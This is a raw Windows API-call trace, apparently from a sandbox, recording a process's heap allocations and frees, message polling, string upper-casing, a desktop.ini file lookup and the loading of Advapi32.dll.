RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0258.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0258.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.022] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0258.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0258.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0258.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.024] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0258.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/desktop.ini", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x410530, dwReserved1=0x10b37, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa57a0 [0258.027] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.027] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0258.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.029] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.029] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.029] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.029] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.030] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.030] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.030] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.030] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.030] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.031] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.031] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.032] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.032] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.033] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.033] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.033] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0258.033] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.033] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0258.033] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.033] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.033] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 